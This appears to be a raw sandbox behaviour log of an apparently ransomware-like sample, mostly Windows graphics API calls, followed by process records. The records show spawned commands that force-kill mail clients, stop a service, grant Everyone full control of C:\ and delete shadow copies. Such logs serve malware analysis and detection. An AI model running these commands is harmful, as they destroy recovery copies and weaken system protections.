DrawThemeEdge () returned 0x0 [0127.938] StretchBlt (hdcDest=0x130107e6, xDest=480, yDest=0, wDest=32, hDest=32, hdcSrc=0xd0107ec, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.938] CloseThemeData () returned 0x0 [0127.938] SelectObject (hdc=0xd0107ec, h=0x85000f) returned 0x200507cd [0127.938] SelectObject (hdc=0x130107e6, h=0x85000f) returned 0x560507fb [0127.938] ImageList_Add (himl=0x5ea888, hbmImage=0x560507fb, hbmMask=0x0) returned 0 [0127.939] DeleteDC (hdc=0xd0107ec) returned 1 [0127.939] DeleteObject (ho=0x200507cd) returned 1 [0127.939] DeleteDC (hdc=0x130107e6) returned 1 [0127.939] DeleteObject (ho=0x560507fb) returned 1 [0127.939] GetSysColor (nIndex=5) returned 0xffffff [0127.939] CreateCompatibleBitmap (hdc=0x10105c7, cx=768, cy=48) returned 0x570507fb [0127.941] ImageList_Create (cx=48, cy=48, flags=0x20, cInitial=16, cGrow=1) returned 0x5eaf30 [0127.942] CreateCompatibleDC (hdc=0x10105c7) returned 0x7c0107b1 [0127.942] CreateCompatibleBitmap (hdc=0x10105c7, cx=16, cy=16) returned 0x160507d9 [0127.942] CreateCompatibleDC (hdc=0x10105c7) returned 0xf0107e2 [0127.942] SelectObject (hdc=0xf0107e2, h=0x160507d9) returned 0x85000f [0127.942] IsThemeActive () returned 0x1 [0127.942] IsAppThemed () returned 0x1 [0127.942] OpenThemeData () returned 0x10001 [0127.942] SelectObject (hdc=0x7c0107b1, h=0x570507fb) returned 0x85000f [0127.942] SetBkColor (hdc=0x7c0107b1, color=0xffffff) returned 0xffffff [0127.942] ExtTextOutW (hdc=0x7c0107b1, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.942] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.942] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.942] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.942] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.942] DrawThemeBackground () returned 0x0 [0127.943] DrawThemeEdge () returned 0x0 [0127.943] StretchBlt (hdcDest=0x7c0107b1, xDest=48, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.943] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.943] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.943] DrawThemeBackground () returned 0x0 [0127.943] DrawThemeEdge () returned 0x0 [0127.943] StretchBlt (hdcDest=0x7c0107b1, xDest=96, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.943] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.943] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.943] DrawThemeBackground () returned 0x0 [0127.943] DrawThemeEdge () returned 0x0 [0127.943] StretchBlt (hdcDest=0x7c0107b1, xDest=144, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.943] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.943] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.943] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.943] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.943] DrawThemeBackground () returned 0x0 [0127.943] DrawThemeEdge () returned 0x0 [0127.943] StretchBlt (hdcDest=0x7c0107b1, xDest=240, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.943] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.943] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.943] DrawThemeBackground () returned 0x0 [0127.943] DrawThemeEdge () returned 0x0 [0127.943] StretchBlt (hdcDest=0x7c0107b1, xDest=288, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.943] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.943] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.943] DrawThemeBackground () returned 0x0 [0127.943] DrawThemeEdge () returned 0x0 [0127.943] StretchBlt (hdcDest=0x7c0107b1, xDest=336, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.944] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.944] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.944] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.944] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.944] DrawThemeBackground () returned 0x0 [0127.944] DrawThemeEdge () returned 0x0 [0127.944] StretchBlt (hdcDest=0x7c0107b1, xDest=432, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.944] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.944] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.944] DrawThemeBackground () returned 0x0 [0127.944] DrawThemeEdge () returned 0x0 [0127.944] StretchBlt (hdcDest=0x7c0107b1, xDest=480, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.944] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.944] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.944] DrawThemeBackground () returned 0x0 [0127.944] DrawThemeEdge () returned 0x0 [0127.944] StretchBlt (hdcDest=0x7c0107b1, xDest=528, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.944] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.944] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.944] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.944] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.944] DrawThemeBackground () returned 0x0 [0127.944] DrawThemeEdge () returned 0x0 [0127.944] StretchBlt (hdcDest=0x7c0107b1, xDest=624, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.944] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.944] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.944] DrawThemeBackground () returned 0x0 [0127.944] DrawThemeEdge () returned 0x0 [0127.944] StretchBlt (hdcDest=0x7c0107b1, xDest=672, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.944] SetBkColor (hdc=0xf0107e2, color=0xffffff) returned 0xffffff [0127.945] ExtTextOutW (hdc=0xf0107e2, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.945] DrawThemeBackground () returned 0x0 [0127.945] DrawThemeEdge () returned 0x0 [0127.945] StretchBlt (hdcDest=0x7c0107b1, xDest=720, yDest=0, wDest=48, hDest=48, hdcSrc=0xf0107e2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.945] CloseThemeData () returned 0x0 [0127.945] SelectObject (hdc=0xf0107e2, h=0x85000f) returned 0x160507d9 [0127.945] SelectObject (hdc=0x7c0107b1, h=0x85000f) returned 0x570507fb [0127.945] ImageList_Add (himl=0x5eaf30, hbmImage=0x570507fb, hbmMask=0x0) returned 0 [0127.947] DeleteDC (hdc=0xf0107e2) returned 1 [0127.947] DeleteObject (ho=0x160507d9) returned 1 [0127.947] DeleteDC (hdc=0x7c0107b1) returned 1 [0127.947] DeleteObject (ho=0x570507fb) returned 1 [0127.947] GetSysColor (nIndex=5) returned 0xffffff [0127.947] CreateCompatibleBitmap (hdc=0x10105c7, cx=1024, cy=64) returned 0x580507fb [0127.950] ImageList_Create (cx=64, cy=64, flags=0x20, cInitial=16, cGrow=1) returned 0x5eb5d8 [0127.950] CreateCompatibleDC (hdc=0x10105c7) returned 0x1a0107dc [0127.950] CreateCompatibleBitmap (hdc=0x10105c7, cx=16, cy=16) returned 0x1e05066c [0127.950] CreateCompatibleDC (hdc=0x10105c7) returned 0xf0107ee [0127.950] SelectObject (hdc=0xf0107ee, h=0x1e05066c) returned 0x85000f [0127.950] IsThemeActive () returned 0x1 [0127.950] IsAppThemed () returned 0x1 [0127.950] OpenThemeData () returned 0x10001 [0127.950] SelectObject (hdc=0x1a0107dc, h=0x580507fb) returned 0x85000f [0127.950] SetBkColor (hdc=0x1a0107dc, color=0xffffff) returned 0xffffff [0127.950] ExtTextOutW (hdc=0x1a0107dc, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.950] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.951] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.951] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.951] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.951] DrawThemeBackground () returned 0x0 [0127.951] DrawThemeEdge () returned 0x0 [0127.951] StretchBlt (hdcDest=0x1a0107dc, xDest=64, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.951] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.951] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.951] DrawThemeBackground () returned 0x0 [0127.951] DrawThemeEdge () returned 0x0 [0127.951] StretchBlt (hdcDest=0x1a0107dc, xDest=128, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.951] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.951] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.951] DrawThemeBackground () returned 0x0 [0127.951] DrawThemeEdge () returned 0x0 [0127.951] StretchBlt (hdcDest=0x1a0107dc, xDest=192, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.951] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.951] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.951] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.951] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.951] DrawThemeBackground () returned 0x0 [0127.951] DrawThemeEdge () returned 0x0 [0127.951] StretchBlt (hdcDest=0x1a0107dc, xDest=320, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.951] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.951] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.951] DrawThemeBackground () returned 0x0 [0127.951] DrawThemeEdge () returned 0x0 [0127.951] StretchBlt (hdcDest=0x1a0107dc, xDest=384, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.952] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.952] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.952] DrawThemeBackground () returned 0x0 [0127.952] DrawThemeEdge () returned 0x0 [0127.952] StretchBlt (hdcDest=0x1a0107dc, xDest=448, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.952] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.952] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.952] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.952] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.952] DrawThemeBackground () returned 0x0 [0127.952] DrawThemeEdge () returned 0x0 [0127.952] StretchBlt (hdcDest=0x1a0107dc, xDest=576, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.952] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.952] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.952] DrawThemeBackground () returned 0x0 [0127.952] DrawThemeEdge () returned 0x0 [0127.952] StretchBlt (hdcDest=0x1a0107dc, xDest=640, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.952] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.952] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.952] DrawThemeBackground () returned 0x0 [0127.952] DrawThemeEdge () returned 0x0 [0127.952] StretchBlt (hdcDest=0x1a0107dc, xDest=704, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.952] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.952] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.952] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.952] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.952] DrawThemeBackground () returned 0x0 [0127.952] DrawThemeEdge () returned 0x0 [0127.952] StretchBlt (hdcDest=0x1a0107dc, xDest=832, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.952] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.952] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.953] DrawThemeBackground () returned 0x0 [0127.953] DrawThemeEdge () returned 0x0 [0127.953] StretchBlt (hdcDest=0x1a0107dc, xDest=896, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.953] SetBkColor (hdc=0xf0107ee, color=0xffffff) returned 0xffffff [0127.953] ExtTextOutW (hdc=0xf0107ee, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0127.953] DrawThemeBackground () returned 0x0 [0127.953] DrawThemeEdge () returned 0x0 [0127.953] StretchBlt (hdcDest=0x1a0107dc, xDest=960, yDest=0, wDest=64, hDest=64, hdcSrc=0xf0107ee, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0127.953] CloseThemeData () returned 0x0 [0127.953] SelectObject (hdc=0xf0107ee, h=0x85000f) returned 0x1e05066c [0127.953] SelectObject (hdc=0x1a0107dc, h=0x85000f) returned 0x580507fb [0127.953] ImageList_Add (himl=0x5eb5d8, hbmImage=0x580507fb, hbmMask=0x0) returned 0 [0128.155] DeleteDC (hdc=0xf0107ee) returned 1 [0128.155] DeleteObject (ho=0x1e05066c) returned 1 [0128.155] DeleteDC (hdc=0x1a0107dc) returned 1 [0128.155] DeleteObject (ho=0x580507fb) returned 1 [0128.155] ReleaseDC (hWnd=0x60138, hDC=0x10105c7) returned 1 [0128.155] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19ec84 | out: hActCtx=0x5d1dcc, lpCookie=0x19ec84) returned 1 [0128.155] GetProcAddress (hModule=0x73af0000, lpProcName="ImageList_GetImageCount") returned 0x73b6ec80 [0128.155] ImageList_GetImageCount (himl=0x5ea1e0) returned 16 [0128.155] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070019) returned 1 [0128.155] SetScrollInfo (hwnd=0x60138, nBar=0, lpsi=0x19ece0, redraw=1) returned 0 [0128.164] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x60138, Msg=0x5, wParam=0x0, lParam=0xae01be) returned 0x0 [0128.164] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x60138, Msg=0x3, wParam=0x0, lParam=0x2b0011) returned 0x0 [0128.165] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x210, wParam=0x3e70001, lParam=0x60138) returned 0x0 [0128.165] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x60138, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0128.165] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070017) returned 1 [0128.165] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x73af0000 [0128.165] GetProcAddress (hModule=0x73af0000, lpProcName="DllGetVersion") returned 0x73bafd60 [0128.166] DllGetVersion () returned 0x0 [0128.166] FreeLibrary (hLibModule=0x73af0000) returned 1 [0128.166] IsAppThemed () returned 0x1 Thread: id = 26 os_tid = 0x1290 Process: id = "4" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x590f5000" os_pid = "0xb24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM outlook.exe /F" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 28 os_tid = 0xd24 Thread: id = 131 os_tid = 0x12f8 Thread: id = 1146 os_tid = 0x2114 Thread: id = 1210 os_tid = 0x2214 Thread: id = 1249 os_tid = 0x22ac Process: id = "5" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x9dfe000" os_pid = "0x1378" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xb24" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 30 os_tid = 0x113c Thread: id = 34 os_tid = 0xeec Thread: id = 37 os_tid = 0x7c0 Thread: id = 52 os_tid = 0x378 Thread: id = 70 os_tid = 0x1368 Process: id = "6" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x728b000" os_pid = "0xe00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM thunderbird.exe /F" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 31 os_tid = 0xeb0 Thread: id = 130 os_tid = 0xb04 Thread: id = 170 os_tid = 0xe28 Thread: id = 1289 os_tid = 0x234c Thread: id = 1412 os_tid = 0x2528 Thread: id = 1466 os_tid = 0x2600 Process: id = "7" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x55e63000" os_pid = "0x11dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xe00" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 33 os_tid = 0xed8 Thread: id = 35 os_tid = 0x10c0 Thread: id = 38 os_tid = 0x88c Thread: id = 69 os_tid = 0x1324 Thread: id = 88 os_tid = 0x1334 Process: id = "8" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0xbe6f000" os_pid = "0x7f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"audioendpointbuilder\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 36 os_tid = 0xbbc Thread: id = 180 os_tid = 0xe64 Process: id = "9" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x8b0f000" os_pid = "0xa74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "icacls \"C:\\*\" /grant Everyone:F /T /C /Q" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 40 os_tid = 0x18c Thread: id = 215 os_tid = 0xf24 Thread: id = 3430 os_tid = 0x42f0 Thread: id = 3499 os_tid = 0x4290 Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xbf94000" os_pid = "0xd4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "cmd /c \"WMIC.exe shadowcopy delet\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 41 os_tid = 0xdfc [0136.592] GetModuleHandleA (lpModuleName=0x0) returned 0x1070000 [0136.592] __set_app_type (_Type=0x1) [0136.592] __p__fmode () returned 0x76953c14 [0136.592] __p__commode () returned 0x769549ec [0136.592] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1086fd0) returned 0x0 [0136.751] __getmainargs (in: _Argc=0x109d1a4, _Argv=0x109d1a8, _Env=0x109d1ac, _DoWildCard=0, _StartInfo=0x109d1b8 | out: _Argc=0x109d1a4, _Argv=0x109d1a8, _Env=0x109d1ac) returned 0 [0136.752] _onexit (_Func=0x1088030) returned 0x1088030 [0136.752] _onexit (_Func=0x1088040) returned 0x1088040 [0136.752] _onexit 